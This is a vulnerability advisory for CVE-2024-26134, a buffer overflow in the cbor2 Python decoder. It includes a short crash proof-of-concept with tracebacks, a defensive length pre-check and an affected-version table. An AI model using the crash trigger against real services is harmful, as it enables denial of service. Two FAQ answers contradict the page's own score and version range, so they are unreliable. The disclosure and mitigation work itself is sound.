Score: 7.5
CWE: 120, 119
EPSS: 0.045%
Advisory Published

CVE-2024-26134: CBOR2 decoder has potential buffer overflow

First published: Mon Feb 19 2024

### Summary

Ever since https://github.com/agronholm/cbor2/pull/204 (or specifically https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542) was merged, I can create a reproducible crash when running the snippet under PoC on a current Debian bullseye aarch64 on a Raspberry Pi 3 (I was **not** able to reproduce this on my x86_64 laptop with Python 3.11; I suspect because there is enough memory to allocate still).

### Details

#### PoC

```py
import json
import concurrent.futures
import cbor2


def test():
    obj = "x" * 131128
    cbor_enc = cbor2.dumps(obj)
    return cbor2.loads(cbor_enc)


with concurrent.futures.ProcessPoolExecutor() as executor:
    future = executor.submit(test)
    print(future.result())
```

```
malloc(): unsorted double linked list corrupted
Traceback (most recent call last):
  File "test.py", line 14, in <module>
    print(future.result())
  File "/usr/lib/python3.9/concurrent/futures/_base.py", line 440, in result
    return self.__get_result()
  File "/usr/lib/python3.9/concurrent/futures/_base.py", line 389, in __get_result
    raise self._exception
concurrent.futures.process.BrokenProcessPool: A process in the process pool was terminated abruptly while the future was running or pending.
```

If one calls it without the indirection via the pool executor, a SystemError is shown that hides the buffer overflow.

```py
import json

import cbor2


def test():
    obj = "x" * 131128
    cbor_enc = cbor2.dumps(obj)
    return cbor2.loads(cbor_enc)


print(test())
```

```
Traceback (most recent call last):
  File "test.py", line 12, in <module>
    print(test())
  File "test.py", line 9, in test
    return cbor2.loads(cbor_enc)
SystemError: <built-in function loads> returned NULL without setting an error
```

### Impact

An attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object.
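A service that cannot upgrade immediately can guard the decoder with a cheap pre-check on the CBOR head. The block below is an added example, not code from the cbor2 project or from the advisory: it parses only the initial byte and length argument of the top-level item (per RFC 8949) and rejects a definite-length byte or text string whose declared length exceeds a caller-chosen cap or the bytes actually supplied; the `POC_DOC` sample is constructed to match the head that `cbor2.dumps("x" * 131128)` produces.

```python
import struct

# CBOR major types (RFC 8949, section 3.1)
BYTE_STRING = 2
TEXT_STRING = 3

# Additional-info values 24..27 carry a 1/2/4/8-byte big-endian argument.
_ARG_WIDTHS = {24: (1, ">B"), 25: (2, ">H"), 26: (4, ">I"), 27: (8, ">Q")}


def cbor_head(data: bytes):
    """Parse only the head of the top-level CBOR item.

    Returns (major_type, argument, head_size); for strings the argument is the
    declared length, None meaning indefinite length (additional info 31).
    Raises ValueError on an empty, truncated, or reserved head.
    """
    if not data:
        raise ValueError("empty input")
    major, info = data[0] >> 5, data[0] & 0x1F
    if info < 24:
        return major, info, 1
    if info == 31:
        return major, None, 1
    if info not in _ARG_WIDTHS:
        raise ValueError(f"reserved additional info {info}")
    width, fmt = _ARG_WIDTHS[info]
    if len(data) < 1 + width:
        raise ValueError("truncated length argument")
    (arg,) = struct.unpack(fmt, data[1:1 + width])
    return major, arg, 1 + width


def check_string_length(data: bytes, limit: int) -> bool:
    """True if a top-level definite-length string fits within `limit` and
    within the bytes actually supplied; other top-level items pass through."""
    major, arg, head = cbor_head(data)
    if major not in (BYTE_STRING, TEXT_STRING) or arg is None:
        return True
    return arg <= limit and arg <= len(data) - head


# Constructed sample mirroring the PoC: cbor2.dumps("x" * 131128) yields the
# head 0x7A (major 3, 4-byte argument) + 0x00020038, then the payload.
POC_HEAD = bytes([0x7A, 0x00, 0x02, 0x00, 0x38])
POC_DOC = POC_HEAD + b"x" * 131128
SMALL_DOC = b"\x63abc"  # constructed: text string "abc", inline length 3

if __name__ == "__main__":
    print(cbor_head(POC_DOC))                    # (3, 131128, 5)
    print(check_string_length(POC_DOC, 65536))   # False: over the cap
```

Indefinite-length (chunked) strings are not covered by this head check, so cap `len(data)` as well; the actual fix remains upgrading cbor2 to 5.6.2.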

Credit: security-advisories@github.com

| Affected Software | Affected Version | How to fix |
|---|---|---|
| pip/cbor2 | >=5.5.1, <5.6.2 | 5.6.2 |
| agronholm CBOR2 Python | >=5.5.1, <5.6.2 | |
| Fedora | =38 | |
| Fedora | =39 | |
| Fedora | =40 | |


Frequently Asked Questions

  • What is the severity of CVE-2024-26134?

    CVE-2024-26134 has not been explicitly assigned a severity score, but it is known to cause crashes in affected software.

  • How do I fix CVE-2024-26134?

    To fix CVE-2024-26134, upgrade cbor2 to version 5.6.2 or later.

  • Which versions of cbor2 are affected by CVE-2024-26134?

    CVE-2024-26134 affects cbor2 versions between 5.5.1 and 5.6.2, inclusive.

  • What platforms are impacted by CVE-2024-26134?

    CVE-2024-26134 impacts systems running Debian Bullseye aarch64 and various versions of Fedora.

  • Who is the vendor for CVE-2024-26134?

    CVE-2024-26134 is associated with the Agronholm cbor2 library.
